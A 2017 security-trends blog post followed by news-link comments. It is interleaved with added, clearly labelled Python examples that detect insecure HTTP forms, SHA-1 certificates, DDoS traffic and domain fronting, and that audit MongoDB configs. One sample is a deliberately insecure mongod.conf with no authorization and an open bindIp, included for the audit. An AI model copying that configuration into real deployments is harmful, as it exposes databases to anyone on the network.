Security trends 2017

2017 will not bring any turn towards better data security. The internet is rife with both well-known and unknown threats, and companies’ systems are supposed to be protected against all of them. Hackers are going to continue to look for new ways to extort and steal information from businesses and organizations, which unfortunately means those businesses and organizations will have to continue to look for new ways to protect themselves.

Critical infrastructure comes under attack in 2017. Critical infrastructures must be better protected from criminals and terrorists who take advantage of the modern technologies that are essential for the functioning of society and the economy. The IT security of industrial control systems (ICS), energy grids and IoT networks needs to be improved in 2017.

There is a push for better web security in 2017. Starting on New Year’s Day, Google’s Chrome will begin labeling as “insecure” all websites that transmit passwords or ask for credit card details over plain-text HTTP. Beginning in January 2017 (Chrome 56), HTTP sites that transmit passwords or credit cards are marked as non-secure, as part of a long-term plan to mark all HTTP sites as non-secure.
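The check Chrome 56 started making is easy to reproduce for your own sites before the browser does it for you. The following is an added example, not code from the original post: a stdlib-only scanner that parses a page and reports password fields and payment-card fields (recognised by their `autocomplete` tokens) that are served from a non-HTTPS page. It goes slightly beyond Chrome’s rule by also flagging a form on an HTTPS page whose `action` posts to plain HTTP. The sample page and hostnames are constructed for the example.

```python
"""Flag password and payment-card fields that a page serves or submits over plain HTTP."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# autocomplete tokens browsers use to recognise payment-card inputs
CARD_TOKENS = {"cc-number", "cc-csc", "cc-exp", "cc-exp-month", "cc-exp-year", "cc-name"}


class _FormScanner(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.form_action = None          # absolute action of the form currently open
        self.fields = []                 # (field kind, submission target)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # relative actions resolve against the page URL, as the browser does
            self.form_action = urljoin(self.page_url, a.get("action") or "")
        elif tag == "input":
            kind = (a.get("type") or "text").lower()
            token = (a.get("autocomplete") or "").lower()
            target = self.form_action or self.page_url   # inputs outside a form post to the page itself
            if kind == "password":
                self.fields.append(("password", target))
            elif token in CARD_TOKENS:
                self.fields.append((token, target))

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_action = None


def insecure_fields(page_url, html):
    """Sensitive fields on a page that is not HTTPS, or whose form posts to a non-HTTPS URL."""
    scanner = _FormScanner(page_url)
    scanner.feed(html)
    page_secure = urlsplit(page_url).scheme == "https"
    return [(kind, target) for kind, target in scanner.fields
            if not page_secure or urlsplit(target).scheme != "https"]


# Constructed sample page: a login form with a relative action and a card form
# posting to an HTTPS payment host.
SAMPLE_PAGE = """
<html><body>
<form action="/login" method="post">
  <input name="user" type="text">
  <input name="pass" type="password">
</form>
<form action="https://pay.example.test/charge" method="post">
  <input name="card" autocomplete="cc-number">
</form>
</body></html>
"""

if __name__ == "__main__":
    for kind, target in insecure_fields("http://shop.example.test/", SAMPLE_PAGE):
        print(f"{kind} field submits to {target} from a non-HTTPS page")
```

Run against the same markup served from an `https://` origin, the scanner reports nothing, which is exactly the remediation Chrome is pushing site owners towards.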

SHA-1 is insecure. Starting on Jan 1, 2017, most CAs will migrate to SHA-2 certificates, and major browser makers have already announced plans to adopt the change, including Microsoft, Google, and Mozilla. Their browsers will no longer trust sites that use SHA-1 starting with that date, and they will mark these websites as insecure. 1/3 of Websites Use SHA-1 Certificates Despite Looming Deadline. SHA-1 will still hang around, like a fart in a spacesuit, for many years to come because some people are lazy enough not to make the change.
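Whether a certificate is still SHA-1 signed is visible directly in its DER encoding: the `signatureAlgorithm` field that follows `tbsCertificate` carries a well-known OID. The block below is an added example (not from the original post) that reads that OID with a minimal DER walker and classifies it; `classify_host` wraps it around the standard library’s `ssl.get_server_certificate` for a live check, which needs network access and is not exercised here. The `fake_cert` helper builds constructed certificate skeletons with a placeholder body so the example runs offline; only their outer layout matches a real certificate.

```python
"""Classify an X.509 certificate's signature algorithm straight from its DER bytes
(stdlib only; the tiny DER reader below understands just enough for this check)."""
import ssl

# Well-known PKIX signature-algorithm OIDs -> (name, considered weak)
SIG_ALGS = {
    "1.2.840.113549.1.1.5":  ("sha1WithRSAEncryption", True),
    "1.2.840.10045.4.1":     ("ecdsa-with-SHA1", True),
    "1.2.840.113549.1.1.11": ("sha256WithRSAEncryption", False),
    "1.2.840.113549.1.1.12": ("sha384WithRSAEncryption", False),
    "1.2.840.10045.4.3.2":   ("ecdsa-with-SHA256", False),
    "1.2.840.10045.4.3.3":   ("ecdsa-with-SHA384", False),
}


def _read_tlv(buf, pos, want=None):
    """Return (value_start, value_end) of the DER element at pos, checking its tag."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if want is not None and tag != want:
        raise ValueError(f"expected tag {want:#x} at offset {pos - 2}, got {tag:#x}")
    if length & 0x80:                      # long form: low bits give the byte count
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return pos, pos + length


def _decode_oid(raw):
    """Decode OBJECT IDENTIFIER contents into dotted form."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                   # high bit clear ends this arc
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def signature_oid(der):
    """Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }"""
    start, _ = _read_tlv(der, 0, want=0x30)
    _, tbs_end = _read_tlv(der, start, want=0x30)        # skip tbsCertificate
    alg_start, _ = _read_tlv(der, tbs_end, want=0x30)    # AlgorithmIdentifier
    oid_start, oid_end = _read_tlv(der, alg_start, want=0x06)
    return _decode_oid(der[oid_start:oid_end])


def classify(der):
    """Return (algorithm name, weak); weak is None for an OID not in SIG_ALGS."""
    oid = signature_oid(der)
    return SIG_ALGS.get(oid, (oid, None))


def classify_host(host, port=443):
    """Fetch a live server's leaf certificate (network access needed) and classify it."""
    pem = ssl.get_server_certificate((host, port))
    return classify(ssl.PEM_cert_to_DER_cert(pem))


# --- constructed test certificates (skeletons with a placeholder body) --------------
def _tlv(tag, content):
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def _encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return bytes(out)


def fake_cert(sig_oid, body_len=8):
    """Outer layout of a real certificate with a dummy tbsCertificate; only the
    signatureAlgorithm field is meaningful. body_len > 120 exercises long-form lengths."""
    tbs = _tlv(0x30, _tlv(0x02, b"\x01") + _tlv(0x04, b"\x00" * body_len))
    alg = _tlv(0x30, _tlv(0x06, _encode_oid(sig_oid)) + b"\x05\x00")   # NULL parameters
    sig = _tlv(0x03, b"\x00" + b"\x00" * 16)                             # unused bits = 0
    return _tlv(0x30, tbs + alg + sig)


if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.5", "1.2.840.113549.1.1.11"):
        print(oid, "->", classify(fake_cert(oid)))
```

Note that this looks only at the leaf certificate. A SHA-1 intermediate in the chain is just as much a problem for the browsers named above, so an inventory script should walk every certificate the server sends.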

There will be changes in how security is viewed in 2017 by businesses. We will likely see cloud adoption continue to grow across the United States, network visibility will no longer just be an option, AI and machine learning will shake old security models, and IoT-powered attacks will continue to rise. All of this will factor into how businesses set up, monitor and secure their networks.

The commoditization of cyberattacks will make them more frequent in 2017. More and more companies suffer disruption to their business due to cyber attacks. Cyber attacks cause companies significant financial losses, but studies show that companies are not prepared for attacks. According to Gartner, by 2018 only 40 per cent of large companies will have official plans for handling cyber attacks. Last year, the percentage was zero.

Strap yourself in for a bumpy ride in 2017. 2016 sucked. 2017 won’t be much better, sorry. DDoS attacks have been around since at least 2000, and they’re not going away. In fact, as the number of devices online grows, the volume and velocity of these attacks are also increasing. DDoS attack toolkits have been around for years, as have services that will let you pay for an attack. Expect to see more of them. 2017 promises to be the most dramatic year yet in DDoS conflict. Whale-sized DDoS attacks will increase, the IoT will become a bigger factor in DDoS, and DDoS will overshadow ransomware attacks and be used for extortion. Expect to see the Internet of Things (IoT) and other connected devices play an important part in these attacks.

Biometric identification will become more common in 2017, but it will not replace passwords. Fingerprint identification has become increasingly common in smartphones, and the technology is already fast and reliable. This year biometric identification devices were sold for 4.5 billion dollars (most of them going into smart phones and laptops). 91 per cent of biometric sales were fingerprint sensors, four per cent face detection and three per cent iris detection.

Biometrics won’t kill passwords any time soon. Even though PIN codes and passwords are actually pretty lousy protection against a skilled cybercriminal, the password will never disappear entirely, as two per cent of the world’s population have fingerprints that are not suitable for biometric identification. Other biometric identification systems have similar limitations and/or are not yet commonly available at reasonable cost. While biometrics, including fingerprint, face, iris, palm and speech recognition, will continue to grow as a more secure substitute for passwords, they will not render passwords obsolete. Until the other biometrics become commonplace, passwords are here to stay, until circa 2030.

The fight over encryption and backdoors is not over in 2017. Many public figures in law enforcement have consistently argued that device encryption presents a new threat to police powers of investigation. On the other side, the House Judiciary Committee’s Encryption Working Group report says encryption backdoors pose a security threat, siding with tech experts. The problem is that any system allowing police to get into those encrypted systems (be it a phone, a computer or communications) could also be exploited by criminals. Any action in this space should weigh short-term benefits against long-term impacts. Many industry experts will rightly tell you there is no such thing as partial data encryption. You either have a fully capable system or none at all.

Given the security events of 2016, coupled with the rapid advancement and adoption of cloud computing, 2017 will be the year in which many finally accept that network infrastructure and security will have to be rethought from the ground up. In 2017 the cloud will become a risk for users: the cloud is becoming insecure, with extortion and IoT openings.

The rivalry between network attacks and network security is accelerating. Crippling Internet services with denial of service attacks is becoming more common throughout the world. DDoS attacks have been around since at least 2000, and they’re not going away. In fact, as the number of devices online grows, the volume and velocity of these attacks are also increasing. IoT-powered attacks will continue to rise, and stopping an attack is not easy. For most companies the key thing is that the attack traffic is stopped before it reaches the company’s Internet connection or servers (which increases reliance on the telecom operator and external services). In addition to disrupting service, denial of service attacks are often used as a distraction during the actual data burglary. DDoS may take over from ransomware as a cause for concern.
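Both DDoS passages above stress that you need to see the attack traffic before you can ask an upstream provider to stop it. As an added example (not code from the original post), here is the simplest form of that visibility: a sliding-window request-rate check over web server access-log lines in Common Log Format, which reports the sources whose peak rate in any 10-second window exceeds a threshold. The log lines are constructed inside the block; the threshold and window are assumptions to tune per site, and in practice the output feeds a blocklist or the operator’s scrubbing service rather than a print statement.

```python
"""Per-source request-rate check over web access-log lines (constructed sample)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Common Log Format: ip ident user [timestamp] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp) or None for a line that does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT)


def peak_rates(lines, window_s=10):
    """For each source IP, the most requests seen inside any window_s-second span.
    Lines are assumed to be in time order per IP, as a server writes them."""
    recent, peak = defaultdict(deque), defaultdict(int)
    span = timedelta(seconds=window_s)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts = parsed
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > span:          # slide the window forward
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return dict(peak)


def flag_sources(lines, window_s=10, threshold=20):
    """Sources whose peak rate exceeds the threshold; candidates for upstream filtering."""
    return {ip: n for ip, n in peak_rates(lines, window_s).items() if n > threshold}


def _fmt(ip, t):
    return f'{ip} - - [{t.strftime(TS_FMT)}] "GET / HTTP/1.1" 200 512'


def make_sample_log():
    """Constructed log: 10.9.9.9 fires 50 requests in 5 s, 10.1.1.1 browses normally."""
    base = datetime(2017, 3, 28, 10, 0, 0, tzinfo=timezone.utc)
    lines = [_fmt("10.9.9.9", base + timedelta(milliseconds=100 * i)) for i in range(50)]
    lines += [_fmt("10.1.1.1", base + timedelta(seconds=10 * i)) for i in range(6)]
    return lines


if __name__ == "__main__":
    for ip, n in flag_sources(make_sample_log()).items():
        print(f"{ip}: {n} requests in a 10 s window")
```

A per-IP counter like this catches a single noisy source; the IoT-driven attacks the text describes spread the load over thousands of addresses, each under any sane per-IP threshold, so the same window logic is usually applied to the aggregate request rate and to distinct-source counts as well, which is where operator-side filtering earns its keep.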

In 2017 IT and security professionals will talk more about business risks. Historically, firewalls, DLP, antivirus, SIEM and other technical point solutions have been the centerpiece of security conversations, but the mindset is slowly shifting from technology to risk. The goal of stopping all attacks and preventing all business impact has been recognized as a fool’s errand, and has shifted to measuring risk and minimizing business impacts. Cyber security is increasingly being viewed as a risk management problem.

In 2017 ‘Security’ Must be Added to our Existing Ethical and Philosophic Concerns Over Artificial Intelligence and Algorithms. Algorithms soon run the world. They present problems that are seriously questioned on both ethical and philosophic grounds; and they have become the basis of fictional Armageddons.

Cyber insurance will be considered more often as one solution for handling cyber risks in 2017. The global cyber insurance market is expected to generate $14 billion by 2022, according to a new report published by Allied Market Research (AMR). That figure represents an impressive compound annual growth rate (CAGR) of nearly 28% from 2016 to 2022.

In 2017 Big Brother will be watching you 24/7. Those of you who’ve read George Orwell’s book 1984 or seen the movie will remember how the citizens of the fictitious totalitarian state of Oceania are constantly under surveillance by order of its dictator, Big Brother. So now swap your home desktop computer, laptop or smart phone for the fictitious telescreen: not only are you sitting in front of what is a modern-day version of the Big Brother telescreen, you are also walking around with one in your pocket or handbag. Sound a bit far-fetched to you? Well, it’s set to become a reality in many countries.

Users will want better security, or at least to feel more secure, in 2017. Many people are prepared to go to extremes for better security. According to a recent Harris Poll survey of over 2,000 adults, nearly 40% of Americans would give up sex for a year, or eating their favourite food, in exchange for better online security that meant they’d never have to worry about being hacked. When you consider that 87 percent of U.S. adults use the internet, it makes sense that cyber security is one of the biggest concerns today. The single biggest thing people can do to help keep their online identity safe is probably the easiest: a solid password, and not giving it to other people. Still, nearly 50% of people have shared a password to an e-mail account or to an account like Netflix.

Security becomes a multi-system issue, and more people are talking about it. Design teams will have to bake security strategies in from the start, no matter how insignificant the device. The good news is that more people are talking about the issue. The real challenge is packing enough security features into designs to prevent security breaches of every sort, including those that can come from other electronics that weren’t even considered as part of the design process. Just as devices get more sophisticated, so do hackers. The reality is that security breaches can even cause physical harm. It’s time to look at this at a multi-system, multi-disciplinary level. Otherwise, we literally could be playing with fire.

Block chains have been a big trend for several years. The block chain market is divided as 2017 starts. During the autumn of 2016, we have seen a number of cooperation initiatives between the financial sector and consulting companies. Microsoft has chosen Ethereum as its block chain platform and offers it on the Azure cloud service. IBM has jumped on the Hyperledger consortium bandwagon and offers its own block chain on the Bluemix service. Google and Amazon are still conspicuous by their absence. Even banks may prefer to use the cloud for block chains.


Other prediction articles worth a look:

What Lies Ahead for Cybersecurity in 2017?

Network Infrastructure, Visibility and Security in 2017

DDoS in 2017: Strap yourself in for a bumpy ride

Cybersecurity Industry Outlook: 2017 to 2021 | CSO Online

IBM’s Cybersecurity Predictions for 2017 – eForensics

https://eforensicsmag.com/ibms-cybersecurity-predictions-2017/

Top 5 Cybersecurity Threats to Watch Out for in 2017

Experts Hopeful as Confidence in Risk Assessment Falls


3,151 Comments

  1. Tomi Engdahl says:

    Mac security facts and fallacies
    https://blog.malwarebytes.com/101/2017/03/mac-security-facts-and-fallacies/?utm_source=double-opt-in&utm_medium=email-internal-b2c&utm_campaign=EM-B2C-2017-March-newsletter-issue1&utm_content=mac-facts-fallacies

    There are many Mac security myths circulating among users. So how can you tell if the advice you’re reading is fact or fallacy? Read on to find out!

    Fallacy: Macs don’t get viruses
    Fact: There’s not much Mac malware out there
    Fallacy: Macs are more secure than Windows
    Fact: macOS has built-in anti-malware software
    Fallacy: Macs don’t need security software

    Reply
  2. Tomi Engdahl says:

    Ransomware scammers exploited Safari bug to extort porn-viewing iOS users
    Apple fixes flaw attackers used to trick uninformed users into paying a fine.
    https://arstechnica.com/security/2017/03/ransomware-scammers-exploited-safari-bug-to-extort-porn-viewing-ios-users/

    Ransomware scammers have been exploiting a flaw in Apple’s Mobile Safari browser in a campaign to extort fees from uninformed users. The scammers particularly target those who viewed porn or other controversial content. Apple patched the vulnerability on Monday with the release of iOS version 10.3.

    The flaw involved the way that Safari displayed JavaScript pop-up windows.

    March 27, 2017
    Mobile Safari scareware campaign thwarted
    https://blog.lookout.com/blog/2017/03/27/mobile-safari-scareware/

    Today, Apple released an update to iOS (10.3) that changed how Mobile Safari handles JavaScript pop-ups, which Lookout discovered scammers using to execute a scareware campaign.

    The scammers abused the handling of pop-up dialogs in Mobile Safari in such a way that it would lock out a victim from using the browser. The attack would block use of the Safari browser on iOS until the victim pays the attacker money in the form of an iTunes Gift Card. During the lockout, the attackers displayed threatening messaging in an attempt to scare and coerce victims into paying.

    However, a knowledgeable user could restore functionality of Mobile Safari by clearing the browser’s cache via the iOS Settings — the attack doesn’t actually encrypt any data and hold it ransom.

    Reply
  3. Tomi Engdahl says:

    Smart phone viruses: five times more than before

    Nokia prepares a mobile data security report twice a year, and the latest version is chilling to read. The amount of smart phone malware increased by 400 per cent from the beginning of 2016.

    Nokia’s Threat Intelligence Report shows that in October 1.35 per cent of all mobile devices were infected. The figure is the largest in the report’s five-year history.

    In the second half of last year the number of smartphone infections increased by 83 per cent compared to the beginning of the year. Four out of five infections hit Android, but iOS devices have also risen into the ranks of targets. Windows PCs have fallen to four per cent.

    Source: http://www.etn.fi/index.php/13-news/6074-alypuhelinviruksia-viisi-kertaa-aiempaa-enemman

    More:
    Nokia Threat Intelligence Report – 2H 2016
    The latest report reveals a 400% increase in the smart phone infection rate in the past 12 months.
    https://pages.nokia.com/8859.Threat.Intelligence.Report.html

    Reply
  4. Tomi Engdahl says:

    Microsoft pulls then revives Docs.com search after complaints of exposed sensitive files
    http://www.zdnet.com/article/microsoft-yanks-docs-com-search-after-complaints-of-exposed-sensitive-files/

    Security experts pointed to numerous sensitive and personal files found on Microsoft’s document sharing site, which lets users share documents publicly by default.

    Reply
  5. Tomi Engdahl says:

    Russian Hackers Domain Fronting
    http://hackaday.com/2017/03/28/russian-hackers-domain-fronting/

    FireEye just put out a report on catching the Russian hacker group “Advanced Persistent Threat 29” (APT29, for lack of a better code name) using the meek plugin for TOR to hide their traffic.

    Anyway, meek was invented to help bring the uncensored Internet to people who live in oppressive regimes, and now cybersecurity researchers have observed it being used by Russian state hackers to hide their tracks. Sigh. Technology doesn’t know which side it’s on — the same backdoor that the FBI wants to plant in all our communications can be used by the mafia just as easily. Plugins that are meant to bring people freedom of speech can just as easily be used to hide the actions of nation-state hackers.

    APT29 Domain Fronting With TOR
    https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

    Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years. There has been considerable discussion about domain fronting following the release of a paper detailing these techniques. Domain fronting provides outbound network connections that are indistinguishable from legitimate requests for popular websites.

    APT29 has used The Onion Router (TOR) and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS. This tunnel provided the attacker remote access to the host system using the Terminal Services (TS), NetBIOS, and Server Message Block (SMB) services, while appearing to be traffic to legitimate websites. The attackers also leveraged a common Windows exploit to access a privileged command shell without authenticating.

    Reply
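Domain fronting, as the FireEye write-up above explains, works because the network sees a TLS handshake for one well-known name while the HTTP request inside the tunnel names another host behind the same front. The one place a defender can see both names is a proxy that terminates or inspects TLS; with SNI alone, fronted traffic is indistinguishable from ordinary CDN traffic, which is the whole point of the technique. The block below is an added example, not from the Hackaday or FireEye posts: detection logic that runs over constructed proxy log lines (timestamp, internal client, SNI, Host header, bytes), flags records where the two names fall under different registrable domains, and aggregates them per client. The “last two labels” rule is an assumption that stands in for a public-suffix-list lookup.

```python
"""Flag TLS connections whose SNI and HTTP Host header disagree (constructed sample)."""
from collections import defaultdict


def registrable(host):
    """Rough registrable-domain guess: the last two labels. Assumption: no public
    suffix list, so names like 'example.co.uk' would need a real PSL lookup."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_line(line):
    """Fields: timestamp client sni host bytes (layout of the constructed log below)."""
    ts, client, sni, host, nbytes = line.split()
    return {"ts": ts, "client": client, "sni": sni, "host": host, "bytes": int(nbytes)}


def find_fronting(log_text):
    """Records where the name in the TLS handshake and the name in the HTTP request
    belong to different registrable domains."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if registrable(rec["sni"]) != registrable(rec["host"]):
            findings.append(rec)
    return findings


def by_client(findings):
    """Aggregate mismatches per internal client: count and bytes moved through them."""
    totals = defaultdict(lambda: {"count": 0, "bytes": 0})
    for rec in findings:
        totals[rec["client"]]["count"] += 1
        totals[rec["client"]]["bytes"] += rec["bytes"]
    return dict(totals)


# Constructed proxy log: 10.0.0.5 repeatedly presents one SNI but asks for a host
# under a different domain; the other clients' SNI and Host stay within one domain.
SAMPLE_LOG = """\
2017-03-28T10:01:02Z 10.0.0.5 www.bigcdn.example.test www.bigcdn.example.test 1832
2017-03-28T10:01:09Z 10.0.0.5 www.bigcdn.example.test tunnel-endpoint.example.net 98231
2017-03-28T10:02:11Z 10.0.0.7 cdn.example.test static.example.test 4401
2017-03-28T10:03:40Z 10.0.0.5 www.bigcdn.example.test tunnel-endpoint.example.net 120554
2017-03-28T10:04:05Z 10.0.0.9 edge.provider.example api.provider.example 770
"""

if __name__ == "__main__":
    for client, agg in by_client(find_fronting(SAMPLE_LOG)).items():
        print(f"{client}: {agg['count']} SNI/Host mismatches, {agg['bytes']} bytes")
```

Expect legitimate mismatches from some CDN setups, so the aggregate (a single client, many mismatches, large byte counts, long-lived connections) is the signal to investigate, not any one record.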
  6. Tomi Engdahl says:

    Gigi Sohn / The Verge:
    Former FCC staffer explains consequences as House of Representatives prepares to vote to repeal FCC’s 2016 broadband privacy rules

    You have just hours to stop Congress from giving away your web browsing history
    Time to make some calls
    http://www.theverge.com/2017/3/27/15073162/fcc-broadband-internet-privacy-rules-congress-vote

    Last week, on a party-line vote, the Senate voted to repeal the Federal Communications Commission’s 2016 broadband privacy rules giving consumers the power to choose how their ISPs use and share their personal data. Today, the House of Representatives will vote, and if the House also votes to repeal the rules, the bill will go to President Trump, who is expected to sign it.

    The consequences of repeal are simple: ISPs like Comcast, AT&T, and Charter will be free to sell your personal information to the highest bidder without your permission — and no one will be able to protect you. The Federal Trade Commission has no legal authority to oversee ISP practices, and the bill under consideration ensures that the FCC cannot adopt “substantially similar” rules.

    unless the bill fails in the House, the nation’s strongest privacy protections will be eliminated and the FCC cannot revive them

    Reply
  7. Tomi Engdahl says:

    Karl Bode / DSLreports:
    House passes resolution that lets ISPs sell customers’ browsing history without user permission, 215 to 205 along party lines — As most had expected, the House of Representatives today voted 215 to 205 to kill privacy rules protecting US broadband subscribers.

    The GOP Just Killed Consumer Broadband Privacy Protections
    http://www.dslreports.com/shownews/The-GOP-Just-Killed-Consumer-Broadband-Privacy-Protections-139244

    Now, with limited competition and ever-shrinking regulatory oversight, there’s arguably little to prevent ISPs from doing whatever they’d like with your personal information, including selling it to companies that may wind up using it against you. And no, just getting a VPN isn’t going to be enough to help consumers tackle the consumer privacy issues to come. Next up for giant ISPs and their Congressional allies: killing net neutrality, and eroding FCC and FTC oversight of giant broadband providers even further.

    Reply
  8. Tomi Engdahl says:

    If You Want to Stop Big Data Breaches, Start With Databases
    https://www.wired.com/2017/03/want-stop-big-data-breaches-start-databases/

    Over the past few years, large-scale data breaches have become so common that even tens of millions of records leaking feels unremarkable. One frequent culprit that gets buried beneath the headlines? Poorly secured databases that connect directly to the internet.

    While companies commonly use these databases to store tempting troves of customer and financial data, they often do so with outdated and weak default security configurations. And while any type of database can be left open or unprotected, a string of breaches over the last few years have all centered around one type in particular: open-source “NoSQL” databases, particularly those using the popular MongoDB database program.

    MongoDB and the other companies that make NoSQL databases don’t have control over how users set up and secure them.

    That disconnect has led to extensive fallout.

    The attacks have also not only continued, but evolved. At the beginning of 2017, a rash of “ransomware” incidents hit exposed MongoDB databases. In these cases attackers actually just deleted a database’s files, but made it seem like paying a Bitcoin ransom worth a few hundred dollars would trigger data restoration.

    Open Source, Open Sesame

    Security experts have been warning about NoSQL configuration insecurity for years, and MongoDB specifically has suffered from two issues. First, it used to have some problematic defaults, like not requiring password authentication and granting users overly broad privileges. MongoDB updated these configurations a few years ago. But, second, because MongoDB is open source, it’s easy to find installers online that incorporate outdated or misguided security settings. Someone who doesn’t have a lot of tech experience, or just isn’t paying attention, can easily wind up accessing and relying on flawed configuration files while setting up a database.

    “It’s not as though attackers have exploited any flaw in these technologies, they haven’t exposed any flaw in MongoDB,”

    Unprotected databases are also trivial to find. Both criminals and researchers alike use network visibility tools like the search engine Shodan, which indexes internet-connected devices, to get a sense of how many exposed databases are out there. Currently searching “MongoDB” on Shodan reveals more than 50,000 exposed databases. They may or may not be vulnerable to attack, but simply being visible increases their risk.

    Reply
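The WIRED piece above blames copied configuration files with no authentication and a listener open to the world. As an added example (not from the article or from MongoDB), the block below puts a constructed weak `mongod.conf` next to a hardened one and audits both for the two settings that matter here: `security.authorization` and `net.bindIp`, which are real mongod.conf keys. The YAML reader is a deliberately tiny one for the nested `key: value` subset mongod.conf uses, not a general parser; treating an absent `bindIp` as a finding is an assumption made because the default has varied across MongoDB versions.

```python
"""Audit a mongod.conf for the two settings behind most exposed-database incidents."""


def parse_simple_yaml(text):
    """Minimal reader for indentation-nested 'key: value' mappings (no lists, no quoting).
    Enough for mongod.conf-style files; not a general YAML parser."""
    root, stack = {}, [(-1, {})]
    stack[0] = (-1, root)
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()          # drop comments and trailing space
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        value = value.strip()
        while indent <= stack[-1][0]:                  # climb back to the right parent
            stack.pop()
        parent = stack[-1][1]
        if value == "":                                # a nested mapping follows
            child = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value
    return root


def _section(cfg, name):
    sec = cfg.get(name)
    return sec if isinstance(sec, dict) else {}


def audit_mongod_conf(text):
    """Return a list of findings; an empty list means both checks passed."""
    cfg = parse_simple_yaml(text)
    findings = []
    if _section(cfg, "security").get("authorization") != "enabled":
        findings.append("security.authorization is not 'enabled': anyone who can "
                        "reach the port has full read/write access")
    bind = _section(cfg, "net").get("bindIp")
    if bind is None:
        findings.append("net.bindIp is not set: rely on no version default, bind explicitly")
    elif any(a.strip() in ("0.0.0.0", "::") for a in bind.split(",")):
        findings.append(f"net.bindIp={bind}: listener exposed on all interfaces")
    return findings


# Constructed: the kind of file a copied installer guide leaves behind.
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0      # reachable from anywhere that can route to the host
"""

# Constructed: same service, listener restricted and authentication required.
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_mongod_conf(conf) or ["ok"])
```

Enabling `authorization` only helps once users with roles actually exist, and binding to loopback only helps if the application reaches the database some other way (a private interface or a tunnel); the audit tells you the file is wrong, not that the deployment is right.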
  9. Tomi Engdahl says:

    Hong Kong gov’t loses computers with personal data of all registered voters
    https://www.hongkongfp.com/2017/03/27/just-hong-kong-govt-loses-computers-personal-data-registered-voters/

    The Registration and Electoral Office (REO) confirmed on Monday evening that it lost two computers containing the personal data of all 3.7 million registered voters in the city.

    The machines were being stored in a locked room at AsiaWorld-Expo, which was used as a backup polling station for Sunday’s chief executive election. The REO said the computers also contained the full names of the 1,194 Election Committee members who voted in the election.

    The personal data included the names, addresses and identity card numbers of all registered voters in Hong Kong. The REO said the personal data was encrypted and there was no evidence that it had been leaked.

    IT sector lawmaker Charles Mok said the “careless” mistake made by the REO officers was “unacceptable.”

    Reply
  10. Tomi Engdahl says:

    Encryp-xit: Europe will go all in for crypto backdoors in June
    App-makers get a choice: Open up voluntarily or we’ll pass laws forcing you to
    https://www.theregister.co.uk/2017/03/30/ec_push_encryption_backdoors/

    The European Commission will in June push for backdoor access to encryption used by apps, according to EU Justice Commissioner Věra Jourová.

    Speaking publicly, and claiming that she has been pushed by politicians across Europe, Jourová said that she will outline “three or four options” that range from voluntary agreements by business to strict legislation.

    The EC’s goal is to provide the police with a “swift and reliable” way to discover what users of encrypted apps have been communicating with others.

    “At the moment, prosecutors, judges, also police and law enforcement authorities, are dependent on whether or not providers will voluntarily provide the access and the evidence. This is not the way we can facilitate and ensure the security of Europeans, being dependent on some voluntary action,” Jourová said, according to EU policy site Euractiv.

    And one day after the March 22 murderous attack in the heart of London, the UK government was publicly critical of the failure of companies like Google and Facebook to remove extremist content on the internet, arguing that they “can and must do more.”

    That was followed shortly after by UK Home Secretary Amber Rudd specifically highlighting Facebook-owned chat app WhatsApp and arguing that the authorities must be given access to messages sent by the Westminster attacker over the service.

    The debate over encryption has been going on for well over a year and until recently was dominated by fights in the United States, most notably between the FBI and Apple over access to an iPhone used by a shooter in San Bernardino, California.

    Reply
  11. Tomi Engdahl says:

    Your internet history on sale to highest bidder: US Congress votes to shred ISP privacy rules
    As House passes law, here’s what you should do about it
    https://www.theregister.co.uk/2017/03/28/congress_approves_sale_of_internet_histories/

    The US House of Representatives has just approved a “congressional disapproval” vote of privacy rules, which gives your ISP the right to sell your internet history to the highest bidder.

    The measure passed by 215 votes to 205.

